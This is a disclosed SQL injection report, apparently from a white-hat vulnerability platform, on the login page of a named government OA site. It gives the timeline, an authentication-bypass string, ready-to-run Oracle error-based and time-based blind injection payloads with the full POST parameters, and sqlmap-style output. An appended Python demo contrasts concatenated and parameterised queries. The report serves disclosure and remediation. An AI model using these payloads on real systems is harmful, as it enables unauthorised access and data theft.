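2015-06-25: Details reported to the vendor; awaiting vendor handling
2015-06-29: Vendor confirmed; details disclosed to the vendor only
2015-07-09: Details disclosed to core white hats and relevant domain experts
2015-07-19: Details disclosed to regular white hats
2015-07-29: Details disclosed to trainee white hats
2015-08-13: Details disclosed to the public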
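As per the title.
Site:
http://oa.gszs.cn/
Login is possible with the universal password admin' or '1'='1.
Data does not seem to be browsable in the back end, but POST injection reveals a lot of information. During injection the URL carries a token and a CAPTCHA, so the request has to be captured; after the session expires it has to be captured again.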
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: userName=sads' AND 9021=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(98)||CHR(120)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (9021=9021) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(112)||CHR(112)||CHR(113)||CHR(62))) FROM DUAL) AND 'OYiL'='OYiL&password=asdad&verify=9258&clsName=LoginAction&methodName=login&action=login

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: userName=sads' AND 6668=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)AND 'VjWG'='VjWG&password=asdad&verify=9258&clsName=LoginAction&methodName=login&action=login
---
[13:31:32] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
The table T_BMK_UPLOAD holds more than 300,000 records.
To stay out of trouble, I'll stop here; the other tables also hold a lot of information.
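Fix as soon as possible; filter the input.
Severity: High
Vulnerability Rank: 11
Confirmed: 2015-06-29 18:17
CNVD confirmed and reproduced the reported vulnerability and has passed it to CNCERT for delivery to the Gansu sub-center, which will coordinate with the organization that manages the website to handle it.
None yet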
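The login bypass in this report works because the submitted values become part of the SQL text. The following is an added example, not part of the original report or the site's code: it shows the concatenated login query beside a bound-parameter version, using an in-memory SQLite database as a stand-in for the Oracle back end. The table name, column names, function names and sample credential are constructed assumptions.

```python
import sqlite3

# The universal password string quoted in the report.
REPORTED_INPUT = "admin' or '1'='1"


def make_db():
    """Constructed sample data; tb_user and its columns are assumptions."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tb_user (username TEXT, password TEXT)")
    # Plaintext only to keep the demo short; real systems store a salted hash.
    db.execute("INSERT INTO tb_user VALUES ('admin', 'S3cret-constructed')")
    return db


def login_concat(db, user, pwd):
    """Vulnerable pattern: input is pasted into the SQL text, so a quote
    in the input ends the string literal and the rest is parsed as SQL."""
    sql = ("SELECT COUNT(*) FROM tb_user WHERE username = '" + user +
           "' AND password = '" + pwd + "'")
    return db.execute(sql).fetchone()[0] > 0


def login_bound(db, user, pwd):
    """Hardened pattern: placeholders keep the SQL text fixed; the driver
    passes the values separately, so quotes in them are only data."""
    sql = "SELECT COUNT(*) FROM tb_user WHERE username = ? AND password = ?"
    return db.execute(sql, (user, pwd)).fetchone()[0] > 0


def compare(user, pwd):
    """Run both variants on the same input and return their results."""
    db = make_db()
    return {"concat": login_concat(db, user, pwd),
            "bound": login_bound(db, user, pwd)}


if __name__ == "__main__":
    # The reported string in either field turns the WHERE clause into a
    # condition that is true for the admin row in the concatenated query.
    print("in username:", compare(REPORTED_INPUT, "x"))
    print("in password:", compare("admin", REPORTED_INPUT))
    print("valid login:", compare("admin", "S3cret-constructed"))
```

In the Java/Oracle stack suggested by the request parameters, the equivalent fix is a prepared statement with bind variables; filtering input alone leaves the query structure under the caller's control.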